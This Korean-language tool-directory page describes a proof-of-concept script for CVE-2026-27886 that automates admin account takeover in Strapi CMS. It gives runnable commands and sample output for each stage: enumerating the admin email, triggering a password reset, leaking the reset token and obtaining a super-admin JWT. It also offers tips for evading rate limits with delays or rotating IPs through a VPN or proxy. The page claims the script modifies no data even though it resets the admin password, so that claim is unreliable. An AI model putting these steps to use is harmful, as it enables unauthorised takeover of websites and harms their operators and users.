Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-27886-PoC-Account-Takeover — Account takeover full PoC for CVE-2026-27886 in Strapi CMS | Kitploit
도구/GitHubGitHub/thesw0rd/cve-2026-27886-poc-account-takeover
ReconnaissancePassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubthesw0rd/cve-2026-27886-poc-account-takeover

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-27886-PoC-Account-Takeover

Account takeover full PoC for CVE-2026-27886 in Strapi CMS

저장소 보기
22개월 전아직 검토되지 않음

CVE-2026-27886 자동 익스플로잇 - 사용 가이드

이 스크립트가 하는 일

4개의 HTTP 요청 그룹으로 전체 계정 탈취 체인을 자동화합니다:

  1. 취약점 확인 - 대상이 취약한지 확인
  2. 이메일 열거 - 부울 오라클을 통해 관리자 이메일 추출(약 500개 요청)
  3. 비밀번호 재설정 트리거 - Strapi의 비밀번호 복구 흐름 시작
  4. 토큰 유출 - 40자 재설정 토큰 탈취(약 320개 요청)
  5. 계정 탈취 - 탈취한 토큰을 사용하여 슈퍼 관리자 JWT 획득

기본 사용법

확인 전용 모드 (안전)

익스플로잇 없이 대상이 취약한지 확인:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles --verify-only

전체 익스플로잇 (가장 빠름)

관리자 이메일을 모르는 경우 모든 것을 자동화:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles

출력:

root@kitploit:~
[+] Target: https://target/api/articles
[+] Base URL: https://target
[*] Verifying vulnerability...
    [+] Vulnerable: baseline=12, where_test=0
[*] Enumerating admin email...
    [email protected]
[*] Triggering password reset for [email protected]...
    [+] Password reset triggered (HTTP 204)
[*] Extracting 40-char reset token...
    [100%] d1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a
[*] Resetting password with stolen token...
    [+] Password reset successful!
    [+] JWT: eyJhbGciOiJIUzI1NiIs...
    [+] User: [email protected] (ID: 1)

[+] SUCCESS! Admin account compromised.
[+] JWT Token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

이메일 열거 건너뛰기 (더 빠름)

관리자 이메일을 이미 알고 있는 경우(약 500개 요청 절약):

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --email [email protected]

사용자 정의 비밀번호

기본값 대신 사용자 정의 비밀번호 설정:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --email [email protected] \
  --password "MyPassword123!"

지연 추가 (속도 제한 회피)

대상에 속도 제한이 있는 경우:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --delay 0.1

각 요청 사이에 100ms를 추가합니다(전체 익스플로잇에 약 2-3분 소요).

명시적 기본 URL

/admin/* 엔드포인트가 다른 호스트에 있는 경우:

root@kitploit:~
./cve-2026-27886-exploit.py https://api.target/articles \
  --base-url https://admin.target

일반적인 문제

"JSON이 아닌 응답"

  • 잘못된 엔드포인트(Strapi Content API 컬렉션이 아님)
  • 시도: https://target/api/products, https://target/api/articles 등

"이메일 열거 실패"

  • 컬렉션이 비어 있음(updated_by_id 외래 키 없음)
  • 관리자 역할이 데이터베이스의 누구와도 일치하지 않음
  • 여러 개가 있는 경우 다른 엔드포인트 시도

"재설정 토큰 추출 실패"

  • 비밀번호 재설정이 트리거되지 않음
  • 추측한 것과 다른 관리자 이메일
  • 토큰 만료(기본적으로 약 24시간 지속되므로 다시 시도)

속도 제한 걸림

  • --delay 0.05 이상 추가
  • 또는 VPN/프록시를 사용하여 IP 주소 회전

보안 참고 사항

이 스크립트:

  • ✅ GET/POST 요청만 수행(데이터 수정 없음)
  • ✅ 취약한 Strapi 쿼리 파라미터 우회만 대상
  • ✅ Strapi의 합법적인 비밀번호 재설정 엔드포인트 사용
  • ✅ 대상에 저장된 아티팩트를 남기지 않음
  • ⚠️ 소음이 큼 - 800개 이상의 요청을 순차적으로 수행(로그에 명확히 나타남)
도구 다운로드